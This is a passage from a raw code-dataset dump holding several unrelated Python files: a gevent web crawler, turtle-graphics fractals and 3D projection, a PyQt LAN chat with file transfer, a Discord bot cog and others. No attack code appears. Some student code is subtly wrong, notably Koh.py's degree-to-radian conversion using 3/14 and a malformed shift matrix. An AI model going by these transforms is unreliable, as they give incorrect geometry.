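# oscillator (the spring constant and step count are illustrative
# assumptions, not values from the script):
dt = 0.01
k = 1.0                       # assumed spring constant: F(x) = -k*x

def force(x):
    return -k * x             # restoring force

xs = [1.0, 1.0]               # two seed states, zero initial velocity
for _ in range(1000):
    Lx, LLx = xs[-1], xs[-2]
    xs.append(dt**2 * force(Lx) + 2*Lx - LLx)   # same scheme as the script

print(round(min(xs), 3), round(max(xs), 3))     # stays close to [-1, 1]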
He explains it really well :)\r\n '''\r\n containsColor = [] # keeps track of the bags that hold the specified color\r\n for k, v in inputs.items():\r\n # check to see if the colors are in the value arrays\r\n for el in v:\r\n if color == el:\r\n # if it is, append it to containsColor array\r\n containsColor.append(k)\r\n checkedColors = []\r\n if len(containsColor) == 0:\r\n return []\r\n else:\r\n for color in containsColor:\r\n checkedColors.append(color)\r\n checkedColors += numBags(color)\r\n return set(checkedColors)\r\n\r\n\r\nprint(len(numBags(\"shiny gold\")))","sub_path":"day07/lol.py","file_name":"lol.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"653149172","text":"from gevent import monkey\n\nmonkey.patch_all()\n\n#从gevent库里导入monkey模块\n\nimport gevent\n\nimport time\n\nimport requests\n\nfrom gevent.queue import Queue\nmonkey.patch_all()\n\n#从gevent库里导入queue模块\n\n\n#monkey.patch_all()能把程序变成协作式运行,就是可以帮助程序实现异步。\n\nstart = time.time()\n\n\n\nurl_list = [\n \"https://www.kaikeba.com/\",\n \"https://www.csdn.net/\",\n \"https://www.json.cn/\",\n \"https://cn.bing.com/\",\n \"https://www.jianshu.com/\",\n \"http://www.techweb.com.cn/\",\n \"https://www.bilibili.com/\",\n \"https://www.huxiu.com/\"\n]\n\n\n\nwork = Queue()\n\n#创建队列对象,并赋值给work\n\nfor url in url_list:\n\n#遍历url_list\n\n work.put_nowait(url)\n\n #用put_nowait()函数可以把网址都放进队列里\n\n\n\ndef crawler():\n\n while not work.empty():\n\n #当队列不是空的时候,就执行下面的程序\n\n url = work.get_nowait()\n\n #用get_nowait()函数可以把队列里的网址都取出\n\n r = requests.get(url)\n\n #用requests.get()函数抓取网址\n\n print(url,work.qsize(),r.status_code)\n\n #打印网址、队列长度、抓取请求的状态码\n\n\n\ntasks_list = [ ]\n\n#创建空的任务列表\n\nfor x in range(2):\n\n#相当于创建了2个爬虫\n\n task = gevent.spawn(crawler)\n\n #用gevent.spawn()函数创建执行crawler()函数的任务\n\n tasks_list.append(task)\n\n #往任务列表添加任务。\n\ngevent.joinall(tasks_list)\n\n#用gevent.joinall方法,执行任务列表里的所有任务,就是让爬虫开始爬取网站\n\nend = time.time()\n\nprint(end-start)","sub_path":"python_optional_class/Web crawler/gevent库和Queue模块来实现多协程.py","file_name":"gevent库和Queue模块来实现多协程.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"513404785","text":"### Settings for a \"cursor tracing\" visualization. 
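# The gevent crawler above uses a common pattern: fill a Queue up front,
# spawn a few greenlets that drain it, then joinall(). A minimal sketch of
# that pattern without network I/O (the items and worker body are
# illustrative; Empty is caught because empty()/get_nowait() is not atomic):
import gevent
from gevent.queue import Queue, Empty

work = Queue()
for item in ["a", "b", "c", "d"]:
    work.put_nowait(item)

def worker(name):
    while not work.empty():
        try:
            item = work.get_nowait()     # each item is consumed exactly once
        except Empty:
            return                       # another greenlet won the race
        gevent.sleep(0)                  # yield, standing in for real work
        print(name, "handled", item)

gevent.joinall([gevent.spawn(worker, i) for i in range(2)])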
###\r\n\r\ninput_video = \"input.mp4\" # name of a video to process\r\ndir_name = \"TEMP\" # directory name in which the frames will be extracted\r\ncursor_path = \"cursor.png\" # path to a cursor png to locate in frames\r\n\r\nstart = 0 # start point (in seconds) of a video, set to 0 if not specified\r\nend = 60 # end point (in seconds) of a video, set to 0 if not specified\r\n\r\nvideo_resolution = (1920, 1080) # resolution of a input video\r\npygame_resolution = (960, 540) # resolution of a visualization in pygame\r\nfps = 60 # fps of a video\r\n\r\nconfidence = 0.45 # confidence in searchng for a cursor\r\nmax_limit = 50 # maximum amount of pixel distance from a previous location","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102770318","text":"X, Y = [], []\nfor y, cmd in enumerate(list_cmd):\n folder = 'dataset/%s/' % cmd\n for filename in os.listdir(folder):\n sr, signal = wavfile.read(folder + filename)\n signal = np.pad(signal,\n (0, 16000 - signal.shape[0]), \n 'constant', \n constant_values=(0, 0))\n assert signal.shape[0] == 16000\n X.append(preprocess.get_feature(signal))\n Y.append(y)\nX = np.array(X)\nY = np.array(Y)\nnp.save('dataset/X.npy', X)\nnp.save('dataset/Y.npy', Y)","sub_path":"py/archive/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111063752","text":"import turtle\r\nfrom random import random, randrange\r\nimport numpy as np\r\nimport math as mt\r\n\r\n# координати паралелепіпеда\r\nxw=600\r\nyw=600\r\nst=300\r\n# розташування координат у строках: дальній чотирикутник - A B I M, ближній чотирикутник D C F E\r\nPrlpd = np.array([[0, 0, 0, 1],\r\n [st, 0, 0, 1],\r\n [st, st, 0, 1],\r\n [0, st, 0, 1],\r\n [0, 0, st, 1],\r\n [st, 0, st, 1],\r\n [st, st, st, 1],\r\n [0, st, st, 1]])\r\n# функция проекції на xy, z=0\r\ndef ProjectXY(Figure):\r\n f = np.array([ [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 1] ]) # по строках\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n return Prxy\r\n# зміщення\r\ndef ShiftXYZ(Figure, l, m, n):\r\n f = np.array([[1, 0, 0, l],\r\n [0, 1, 0, m],\r\n [0, 0, 1, n],\r\n [1, 0, 0, 1]]) # по строках\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n return Prxy\r\n# обертання коло х\r\ndef insertX(Figure, TetaG):\r\n TetaR=(3/14*TetaG)/180\r\n f = np.array([[1, 0, 0, 0],\r\n [0, mt.cos(TetaR), mt.sin(TetaR), 0],\r\n [0, -mt.sin(TetaR), mt.cos(TetaR), 0],\r\n [0, 0, 0, 1]])\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n return Prxy\r\n# аксонометрія\r\ndef dimetri(Figure, TetaG1, TetaG2):\r\n TetaR1=(3/14*TetaG1)/180\r\n TetaR2=(3/14*TetaG2)/180\r\n f1 = np.array([[mt.cos(TetaR1), 0 , -mt.sin(TetaR1), 0],\r\n [0, 1, 0, 0],\r\n [mt.sin(TetaR1), 0, mt.cos(TetaR1), 1],\r\n [0, 0, 0, 0],])\r\n ft1 = f1.T\r\n Prxy1 = Figure.dot(ft1)\r\n f2 = np.array([[1, 0, 0, 0],\r\n [0, mt.cos(TetaR2), mt.sin(TetaR2), 0],\r\n [0, -mt.sin(TetaR2), mt.cos(TetaR2), 0],\r\n [0, 0, 0, 1]])\r\n ft2=f2.T\r\n Prxy2 = Prxy1.dot(ft2)\r\n return Prxy2\r\n\r\n\r\n# функція побудови растрового паралелепіпеда\r\ndef PrlpdWiz(Prxy3):\r\n # дальня грань - (в проекції ліва)\r\n Ax1 = Prxy3[0, 0]\r\n Ay1 = Prxy3[0, 1]\r\n Bx1 = Prxy3[1, 0]\r\n By1 = Prxy3[1, 1]\r\n Ix1 = Prxy3[2, 0]\r\n Iy1 = Prxy3[2, 1]\r\n Mx1 = Prxy3[3, 0]\r\n My1 = Prxy3[3, 1]\r\n # ближня грань - (в проекції права)\r\n Dx1 = Prxy3[4, 0]\r\n Dy1 = 
Prxy3[4, 1]\r\n Cx1 = Prxy3[5, 0]\r\n Cy1 = Prxy3[5, 1]\r\n Fx1 = Prxy3[6, 0]\r\n Fy1 = Prxy3[6, 1]\r\n Ex1 = Prxy3[7, 0]\r\n Ey1 = Prxy3[7, 1]\r\n\r\n # дальня грань - (в проекції ліва)\r\n turtle.up()\r\n turtle.goto(Ax1, Ay1)\r\n turtle.down()\r\n turtle.goto(Bx1, By1)\r\n turtle.goto(Ix1, Iy1)\r\n turtle.goto(Mx1, My1)\r\n turtle.goto(Ax1, Ay1)\r\n\r\n # ближча грань - (в проекції права)\r\n turtle.up()\r\n turtle.goto(Dx1, Dy1)\r\n turtle.down()\r\n turtle.goto(Cx1, Cy1)\r\n turtle.goto(Fx1, Fy1)\r\n turtle.goto(Ex1, Ey1)\r\n turtle.goto(Dx1, Dy1)\r\n\r\n # верхеня грань - (в проекції верхня)\r\n\r\n turtle.up()\r\n turtle.goto(Ax1, Ay1)\r\n turtle.down()\r\n turtle.goto(Bx1, By1)\r\n turtle.goto(Cx1, Cy1)\r\n turtle.goto(Dx1, Dy1)\r\n turtle.goto(Ax1, Ay1)\r\n\r\n # верхеня грань - (в проекції верхня)\r\n turtle.up()\r\n turtle.goto(Mx1, My1)\r\n turtle.down()\r\n turtle.goto(Ix1, Iy1)\r\n turtle.goto(Fx1, Fy1)\r\n turtle.goto(Ex1, Ey1)\r\n turtle.goto(Mx1, My1)\r\n\r\n # ліва грань - (в проекції ближня)\r\n turtle.up()\r\n turtle.goto(Ax1, Ay1)\r\n turtle.down()\r\n turtle.goto(Mx1, My1)\r\n turtle.goto(Ex1, Ey1)\r\n turtle.goto(Dx1, Dy1)\r\n turtle.goto(Ax1, Ay1)\r\n\r\n # права грань - (в проекції дальня)\r\n turtle.up()\r\n turtle.goto(Bx1, By1)\r\n turtle.down()\r\n turtle.goto(Ix1, Iy1)\r\n turtle.goto(Fx1, Fy1)\r\n turtle.goto(Cx1, Cy1)\r\n turtle.goto(Bx1, By1)\r\n\r\n return PrlpdWiz\r\n\r\n\r\n\r\nsize = 300; n = 2;\r\ndef koch_curve(size, n):\r\n if n == 0:\r\n turtle.forward(size)\r\n else:\r\n koch_curve(size / 3, n - 1)\r\n turtle.left(60)\r\n koch_curve(size / 3, n - 1)\r\n turtle.right(120)\r\n koch_curve(size / 3, n - 1)\r\n turtle.left(60)\r\n koch_curve(size / 3, n - 1)\r\n\r\ndef draw_koch_snowflake(size, n):\r\n for i in range(3):\r\n koch_curve(size, n)\r\n turtle.right(120)\r\n\r\ndraw_koch_snowflake(size, n)\r\n# --------------- багатократний фрактал КОХА (сніжинка) - як форма черепашки ---------\r\ndef koch_curve(turtle, steps, length):\r\n if steps == 0:\r\n turtle.forward(length)\r\n else:\r\n for angle in [60, -120, 60, 0]:\r\n koch_curve(turtle, steps - 1, length / 3)\r\n turtle.left(angle)\r\n\r\ndef koch_snowflake(turtle, steps, length):\r\n turtle.begin_poly()\r\n\r\n for _ in range(3):\r\n koch_curve(turtle, steps, length)\r\n turtle.right(120)\r\n\r\n turtle.end_poly()\r\n\r\n return turtle.get_poly()\r\n# ------------------------------ зміна характеристик черепахи ---------------------\r\nturtle.speed(\"fastest\")\r\nturtle.register_shape(\"snowflake\", koch_snowflake(turtle.getturtle(), 2, 100))\r\nturtle.reset()\r\nturtle.penup()\r\nturtle.shape(\"snowflake\")\r\n\r\nwidth, height = turtle.window_width() / 2, turtle.window_height() / 2\r\nwidth=int(width)\r\nheight =int(height)\r\nfor _ in range(7):\r\n turtle.color((random(), random(), random()), (random(), random(), random()))\r\n turtle.goto(randrange(-width, width), randrange(-height, height))\r\n turtle.stamp()\r\n\r\n# ------------------------------ зміна характеристик черепахи ---------------------\r\nturtle.shape(\"triangle\")\r\nturtle.stamp()\r\nturtle.forward(1)\r\n\r\n\r\nxw=600; yw=600; st=50; TetaG1=180; TetaG2=-90\r\nl=(xw/2)-st; m=(yw/2)-st; n=m\r\n#Prlpd1=ShiftXYZ (Prlpd, l, m, n)\r\nPrlpd2=dimetri (Prlpd, TetaG1, TetaG2)\r\nPrxy3=ProjectXY 
(Prlpd2)\r\nPrlpdWiz(Prxy3)\r\nturtle.screen.exitonclick()\r\nturtle.screen.mainloop()\r\n#--------------------------------------------------------------------------------------\r\n","sub_path":"Labaratorywork6/Koh.py","file_name":"Koh.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42324157","text":"import os\nimport json\nfrom signals import S\nfrom PyQt4 import QtCore, QtNetwork\n\n#in milliseconds\nREAD_TIMEOUT=10000\nCONNECTION_TIMEOUT=10000\n\nBROADCAST_INTERVAL=1000\nSCAN_INTERVAL=3000\n\n#in bytes\nPACKET_SIZE=1024\n\n# FIXED TCP PORT\nTCP_PORT=13373\n# FIXED UDP PORT\nUDP_PORT=13373\n\nKEY='HailHydra'\n\nclass NetworkInterface():\n \"\"\" Generic class for network connections \"\"\"\n def __init__(self):\n self.connection = None\n\n S.SEND_MSG.connect(self.sendMsg)\n S.SEND_FILE.connect(self.sendFile)\n\n def readData(self):\n instream = QtCore.QDataStream(self.connection)\n instream.setVersion(QtCore.QDataStream.Qt_4_0)\n\n if self.connection.bytesAvailable() < 4:\n return\n\n # Reading blocksize\n blockSize = instream.readUInt32()\n\n # Checking if the inputstream matches the blocksize\n if self.connection.bytesAvailable() < blockSize:\n return\n\n # Detecting the data type\n header_bytes = instream.readString()\n header = json.loads(str(header_bytes, encoding='utf-8'))\n\n if(header['TYPE']=='MSG'):\n S.MSG_RECV.emit(header)\n\n elif(header['TYPE']=='FILE'):\n actual_bytes=header['SIZE']\n recv_bytes=0\n\n # Storing file in default location\n new_path = QtCore.QDir.homePath() + '/LanChat/'\n if not QtCore.QDir(new_path).exists():\n QtCore.QDir(QtCore.QDir.homePath()).mkdir('LanChat')\n\n S.FILE_INIT.emit(header)\n\n file=open(new_path+header['NAME'],\"wb\")\n\n self.connection.waitForReadyRead(-1)\n\n # Writing raw bytes to file\n while(True):\n S.PROGRESS_UPD.emit('DOWNLOAD', (recv_bytes/actual_bytes)*100)\n\n bytes_remain=self.connection.bytesAvailable()\n if (bytes_remain==0):\n break\n\n recv_bytes=recv_bytes+bytes_remain\n content=instream.readRawData(bytes_remain)\n file.write(content)\n\n if(recv_bytes==actual_bytes):\n break\n\n self.connection.waitForReadyRead(READ_TIMEOUT)\n\n file.close()\n if(actual_bytes==recv_bytes):\n S.PROGRESS_UPD.emit('DOWNLOAD', 100)\n\n header['PATH']=new_path\n S.FILE_RECV.emit(header)\n else:\n print('Error occured')\n\n def sendMsg(self,msg):\n if (msg==''):\n return\n\n # Array of bytes to hold the data\n block = QtCore.QByteArray()\n\n # Datastream\n outstream = QtCore.QDataStream(block, QtCore.QIODevice.WriteOnly)\n outstream.setVersion(QtCore.QDataStream.Qt_4_0)\n\n # Inserting space to write the block size\n outstream.writeUInt32(0)\n\n # Message\n header={'TYPE':'MSG','MSG':msg}\n header_bytes=bytes(json.dumps(header),encoding='utf-8')\n outstream.writeString(header_bytes)\n\n # Writing block size at the beginning of stream\n outstream.device().seek(0)\n outstream.writeUInt32(block.size() - 4)\n\n # Writing data to socket\n self.connection.write(block)\n\n def sendFile(self, filepath):\n if (filepath==''):\n return\n\n S.PROGRESS_UPD.emit('UPLOAD', 0)\n\n # Array of bytes to hold the data\n block = QtCore.QByteArray()\n\n # Datastream\n outstream = QtCore.QDataStream(block, QtCore.QIODevice.WriteOnly)\n outstream.setVersion(QtCore.QDataStream.Qt_4_0)\n\n # Inserting space to write the block size\n outstream.writeUInt32(0)\n\n # Header for file\n filename = os.path.split(filepath)[-1]\n\n actual_bytes=os.path.getsize(filepath)\n 
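# The transfer loop just below streams the file in PACKET_SIZE chunks and
# derives its progress figure from bytes_sent / total_bytes. A minimal
# stand-alone sketch of that chunked-read pattern (chunk size and path are
# illustrative assumptions):
def iter_chunks(path, chunk_size=1024):
    with open(path, "rb") as f:
        while True:
            chunk = f.read(chunk_size)
            if not chunk:                # b'' signals end of file
                break
            yield chunk
# usage sketch: total = os.path.getsize(path); add len(chunk) per chunk sent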
send_bytes=0\n\n header={'TYPE':'FILE',\n 'NAME':filename,\n 'SIZE':actual_bytes}\n\n header_bytes=bytes(json.dumps(header),encoding='utf-8')\n outstream.writeString(header_bytes)\n\n outstream.device().seek(0)\n outstream.writeUInt32(block.size() - 4)\n\n # Writing header for file\n self.connection.write(block)\n\n # Raw bytes of the file\n f = open(filepath, \"rb\")\n try:\n byte = f.read(PACKET_SIZE)\n while byte != b'':\n S.PROGRESS_UPD.emit('UPLOAD', (send_bytes/actual_bytes)*100)\n\n block.clear()\n outstream.device().seek(0)\n outstream.writeRawData(byte)\n\n self.connection.waitForBytesWritten(-1)\n self.connection.write(block)\n\n byte = f.read(PACKET_SIZE)\n send_bytes=send_bytes+PACKET_SIZE\n finally:\n f.close()\n\n S.PROGRESS_UPD.emit('UPLOAD', 100)\n S.FILE_SENT.emit()\n\nclass Server(NetworkInterface):\n \"\"\" Class definition for the TCP server \"\"\"\n def __init__(self):\n NetworkInterface.__init__(self)\n\n self.tcpServer = QtNetwork.QTcpServer()\n self.udpSocket= QtNetwork.QUdpSocket()\n\n self.timer = QtCore.QTimer()\n\n # Send a perodic broadcast for discovery\n def broadcast(self):\n self.timer.start(BROADCAST_INTERVAL)\n self.timer.timeout.connect(self.sendDatagram)\n\n # Datagram to send\n def sendDatagram(self):\n # Code for broadcasting in network\n self.udpSocket.writeDatagram(KEY,QtNetwork.QHostAddress(QtNetwork.QHostAddress.Broadcast),UDP_PORT)\n\n # Waiting for a TCP connection\n def listen(self):\n # Listening to a specific port\n if not self.tcpServer.listen(port=TCP_PORT):\n print('Error occured')\n\n # Function is called when new connection is available\n self.tcpServer.newConnection.connect(self.newconnection)\n\n def newconnection(self):\n if(self.connection):\n return\n\n # Stops the UPD broadcast\n self.timer.stop()\n\n # Saves the socket connection\n self.connection = self.tcpServer.nextPendingConnection()\n\n # Remote terminal ipaddress\n peerAddress = self.connection.peerAddress().toString()\n\n S.DEVICE_CONNECTED.emit(peerAddress)\n\n # Codes to execute when connection is dropped\n self.connection.disconnected.connect(self.close)\n self.connection.disconnected.connect(S.DISCONNECTED.emit)\n\n # Function to run when data to read is available\n self.connection.readyRead.connect(self.readData)\n\n # Closes socket and server if disconnected\n def close(self):\n if (self.connection):\n self.connection.close()\n self.connection=None\n self.tcpServer.close()\n\nclass Client(NetworkInterface):\n \"\"\" Class definition for TCP client \"\"\"\n def __init__(self):\n NetworkInterface.__init__(self)\n\n self.connection = QtNetwork.QTcpSocket()\n self.udpSocket = QtNetwork.QUdpSocket()\n\n self.hostlist = []\n\n self.timer1 = QtCore.QTimer()\n\n def findHosts(self):\n self.udpSocket.bind(UDP_PORT)\n self.udpSocket.readyRead.connect(self.recvDatagram)\n\n # Timer to emit hostlist\n self.timer1.start(SCAN_INTERVAL)\n self.timer1.timeout.connect(self.emitHosts)\n\n S.CONNECT_HOST.connect(self.connect)\n\n def recvDatagram(self):\n while self.udpSocket.hasPendingDatagrams():\n datagram, host, port = self.udpSocket.readDatagram(self.udpSocket.pendingDatagramSize())\n key=str(datagram, encoding='ascii')\n strHost=host.toString()\n if(key==KEY):\n if(strHost not in self.hostlist):\n self.hostlist.append(strHost)\n\n def emitHosts(self):\n # Sending a copy of list\n S.HOST_LIST.emit(self.hostlist.copy())\n self.hostlist.clear()\n\n def connect(self, host):\n self.timer1.stop()\n\n self.connection.connectToHost(host, TCP_PORT)\n\n # Code to run when connection is 
established\n if(self.connection.waitForConnected(CONNECTION_TIMEOUT)):\n S.DEVICE_CONNECTED.emit(host)\n\n # Function to run when data to read is available\n self.connection.readyRead.connect(self.readData)\n\n # Codes to execute when connection is dropped\n self.connection.disconnected.connect(self.close)\n self.connection.disconnected.connect(S.DISCONNECTED.emit)\n\n # Code to run when connection timeout\n else:\n self.close()\n S.NO_CONNECTION.emit()\n\n # Closes socket if disconnected\n def close(self):\n self.connection.close()\n\nclass NetworkThread(QtCore.QThread):\n \"\"\"Defining a thread to be used for networking\"\"\"\n def __init__(self):\n QtCore.QThread.__init__(self)\n \n self.running = False\n self.mode = None\n \n # Runs in main thread \n def startThread(self,mode):\n self.mode = mode\n self.start() \n \n # Runs in seperate thread \n def run(self):\n # Network objects are created within this thread only\n self.running = True\n\n if (self.mode == 'CLIENT'):\n client = Client()\n\n # Finds hosts in the network\n client.findHosts()\n\n elif(self.mode == 'SERVER'):\n server = Server()\n\n # Broadcast datagram to everyone\n server.broadcast()\n\n # Listen for incoming TCP connection\n server.listen()\n\n # Event loop to prevent thread from terminating\n self.exec_()\n\n def quit(self):\n self.running = False\n QtCore.QThread.quit(self)\n\nif __name__ == '__main__':\n print('Nothing to run')\nelse:\n networkThread = NetworkThread()\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408279814","text":"import json\nimport sys\nimport traceback\nimport asyncio\nimport datetime\nimport discord\nfrom discord.ext import commands\n\nimport data\nimport rally_api\nimport validation\nimport errors\nimport aiohttp\n\nfrom cogs import update_cog\n\nfrom constants import *\nfrom utils import pretty_print\nfrom utils.converters import TimeframeType\n\n\nclass DefaultsCommands(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n async def cog_after_invoke(self, ctx):\n await pretty_print(\n ctx, \"Command completed successfully!\", title=\"Success\", color=SUCCESS_COLOR\n )\n\n @errors.standard_error_handler\n async def cog_command_error(self, ctx, error):\n # All other Errors not returned come here. 
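# The LanChat module above frames every TCP payload the same way: a 4-byte
# unsigned length prefix followed by a JSON header (QDataStream integers are
# big-endian by default). A simplified sketch of that wire format using the
# standard struct module, pure functions over bytes with no sockets; it folds
# QDataStream's extra internal string-length field into the single prefix:
import json
import struct

def frame(header: dict) -> bytes:
    body = json.dumps(header).encode("utf-8")
    return struct.pack(">I", len(body)) + body    # length prefix + payload

def unframe(data: bytes) -> dict:
    (size,) = struct.unpack(">I", data[:4])       # read the 4-byte prefix
    return json.loads(data[4:4 + size].decode("utf-8"))

assert unframe(frame({"TYPE": "MSG", "MSG": "hi"})) == {"TYPE": "MSG", "MSG": "hi"}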
And we can just print the default TraceBack.\n print(\"Ignoring exception in command {}:\".format(ctx.command), file=sys.stderr)\n traceback.print_exception(\n type(error), error, error.__traceback__, file=sys.stderr\n )\n\n @staticmethod\n async def update_setting(ctx, alert, alert_nr, value, setting):\n # check if settings have been configured on the dashboard\n settings = data.get_alerts_settings(ctx.guild.id)\n if not settings:\n return await pretty_print(ctx, \"Alert settings have not been configured on the dashboard\", title='Error', color=ERROR_COLOR)\n\n settings = settings[ALERTS_SETTINGS_KEY]\n\n # check if given alert is valid\n if alert not in settings:\n return await pretty_print(ctx, \"Invalid \", title='Error', color=ERROR_COLOR)\n\n channel_object = None\n instance = None\n # check if alert_nr is a digit and check if its valid\n if alert_nr.isdigit():\n if int(alert_nr) > len(settings[alert]['instances']) or int(alert_nr) < 0:\n return await pretty_print(ctx, \"Couldn't find an entry by that alert number\", title='Error', color=ERROR_COLOR)\n\n instance = settings[alert]['instances'][int(alert_nr) - 1]\n channel_object = discord.utils.get(ctx.guild.channels, name=instance['channel'])\n\n # check if alert_nr was valid and instance and channel_object were set\n if not channel_object or not instance:\n return await pretty_print(ctx, \"Invalid \", title='Error', color=ERROR_COLOR)\n\n # update settings\n instance['settings'][setting] = value\n data.set_alerts_settings(ctx.guild.id, json.dumps(settings))\n\n return await pretty_print(ctx, \"Alert settings have been updated\", title='Success', color=SUCCESS_COLOR)\n\n @commands.command(\n name='setmin',\n help=' - Set the minimum amount for an alert'\n )\n @commands.guild_only()\n async def setmin(self, ctx, alert, alert_nr, value):\n return await self.update_setting(ctx, alert, alert_nr, value, 'minamount')\n\n @commands.command(\n name='setmax',\n help=' - Set the minimum amount for an alert'\n )\n @commands.guild_only()\n async def setmax(self, ctx, alert, alert_nr, value):\n return await self.update_setting(ctx, alert, alert_nr, value, 'maxamount')\n\n @commands.command(\n name='settimezone',\n help=' - Set timezone setting for daily stats message'\n )\n @commands.guild_only()\n async def settimezone(self, ctx, alert_nr, value):\n return await self.update_setting(ctx, 'daily_stats', alert_nr, value, 'timezone')\n\n @commands.command(\n name='allcoinstats',\n help=' - (day/week) list the following stats in the coin alerts channel based on the time given'\n )\n @commands.guild_only()\n async def allcoinstats(self, ctx, timeframe: TimeframeType):\n # delete week old data\n data.delete_week_old_events()\n\n # if default coin isn't set, send info to user about how to set it\n default_coin = data.get_default_coin(ctx.guild.id)\n if not default_coin:\n return await pretty_print(\n ctx, \"A default coin has not been set. An admin can set the default coin by typing $setdefaultcoin . 
Type $help for more information.\", title=\"Error\", color=ERROR_COLOR\n )\n\n # get statistics\n if timeframe == 'day':\n coin_stats = update_cog.get_day_stats(default_coin)\n else:\n coin_stats = update_cog.get_week_stats(default_coin)\n\n rewards = rally_api.get_coin_rewards(default_coin)\n coin_image_url = rally_api.get_coin_image_url(default_coin)\n\n # format message, done through dict to make keeping this and daily_stats message similar easier\n extra_str = 'Today' if timeframe == 'day' else 'This Week'\n reward_str = 'last24HourEarned' if timeframe == 'day' else 'weeklyAccumulatedReward'\n message = {\n \"description\": f\"```xl\\n\"\n f\"- {extra_str}`s purchases: {len(coin_stats['buy'])}\\n\\n\"\n f\"- {extra_str}`s donations: {len(coin_stats['donate'])}\\n\\n\"\n f\"- {extra_str}`s transfers: {len(coin_stats['transfer'])}\\n\\n\"\n f\"- {extra_str}`s conversions: {len(coin_stats['convert'])}\\n\\n\"\n f\"- {extra_str}`s redeems: {len(coin_stats['redeem'])}\\n\\n\"\n f\"- {extra_str}`s rewards earned: {round(rewards[reward_str], 3)}\\n\"\n f\"```\",\n \"color\": 0xff0000,\n \"author\": {\n \"name\": f\"{default_coin} Stats {extra_str}\",\n \"icon_url\": coin_image_url\n },\n \"timestamp\": datetime.datetime.now().isoformat()\n }\n\n # send message\n embed = discord.Embed.from_dict(message)\n return await ctx.send(embed=embed)\n\n @commands.command(\n name=\"set_default_coin\",\n help=\" Set a default coin to be used across the server\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def set_default_coin(self, ctx, coin_name):\n await pretty_print(\n ctx,\n f\"Are you sure you want to set {coin_name} as default coin?\",\n caption=\"Give 👍 reaction to confirm\",\n title=\"Warning\",\n color=WARNING_COLOR,\n )\n\n def check(reaction, user):\n return user == ctx.message.author and str(reaction.emoji) == \"👍\"\n\n try:\n await self.bot.wait_for(\"reaction_add\", timeout=30.0, check=check)\n except asyncio.TimeoutError:\n await pretty_print(\n ctx, \"Set default coin timed out 👎\", title=\"Timeout\", color=ERROR_COLOR\n )\n else:\n data.add_default_coin(ctx.guild.id, coin_name)\n await pretty_print(\n ctx,\n f\"{coin_name} is now the default coin 👍\",\n title=\"Set\",\n color=GREEN_COLOR,\n )\n\n @commands.command(\n name=\"change_prefix\",\n help=\" Prefix for bot commands\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def set_prefix(self, ctx, prefix):\n data.add_prefix_mapping(ctx.guild.id, prefix)\n\n @commands.command(\n name=\"change_bot_name\",\n help=\"Change the bot's name on this server\"\n )\n @commands.is_owner()\n async def set_bot_name(self, ctx, *, name=\"\"):\n try:\n await self.bot.user.edit(username=name)\n data.set_bot_name(ctx.guild.id, name)\n except Exception as e:\n return await ctx.send(f'Error: {e.text.split(\":\")[-1]}')\n\n @commands.command(\n name=\"change_bot_avatar\",\n help=\"Changes the bot's avatar\"\n )\n @commands.is_owner()\n async def set_bot_avatar(self, ctx, url=None):\n if url is None:\n url = DEFAULT_BOT_AVATAR_URL\n\n try:\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n avatar = await response.read()\n\n await self.bot.user.edit(avatar=avatar)\n data.set_bot_avatar(ctx.guild.id, url)\n except:\n return await ctx.send('Error setting new bot avatar')\n\n @commands.command(\n name=\"role_call\",\n help=\" Display users who have access to a given role\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def role_call(self, ctx, role: 
discord.Role):\n usersStr = \"\"\n for member in ctx.guild.members:\n if role in member.roles:\n usersStr += f\"{member}\\n\"\n await pretty_print(\n ctx,\n usersStr,\n title=f\"Users with {role} role\",\n color=GREEN_COLOR,\n )\n\n @commands.command(\n name=\"list_all_users\",\n help=\"Display users who have been registered\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def list_all_users(self, ctx):\n usersStr = \"\"\n registered_users = data.get_all_users()\n for user in registered_users:\n member = await ctx.guild.fetch_member(user[DISCORD_ID_KEY])\n if member:\n usersStr += f\"{member}\\nRallyId: {user[RALLY_ID_KEY]}\\nDiscordId: {user[DISCORD_ID_KEY]}\\n\\n\"\n await pretty_print(\n ctx,\n usersStr or \"No registered users on this server\",\n title=f\"All registered users\",\n color=GREEN_COLOR,\n )\n","sub_path":"rallyrolebot/cogs/defaults_cog.py","file_name":"defaults_cog.py","file_ext":"py","file_size_in_byte":9503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"525618023","text":"# -*- coding: utf-8 -*-\n#\n\nimport sys\nimport os\n\n# -- PHP highlighting configuration --------------------------------------------\n\nfrom sphinx.highlighting import lexers\nif lexers:\n\tfrom pygments.lexers.web import PhpLexer\n\tlexers['php'] = PhpLexer(startinline=True)\n\n# -- General configuration -----------------------------------------------------\n\nextensions = ['sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.ifconfig']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'typo3forum'\ncopyright = u'2016, Mittwald CM Service'\n\n# The version info for the project you're documenting, acts as replacement for\n# 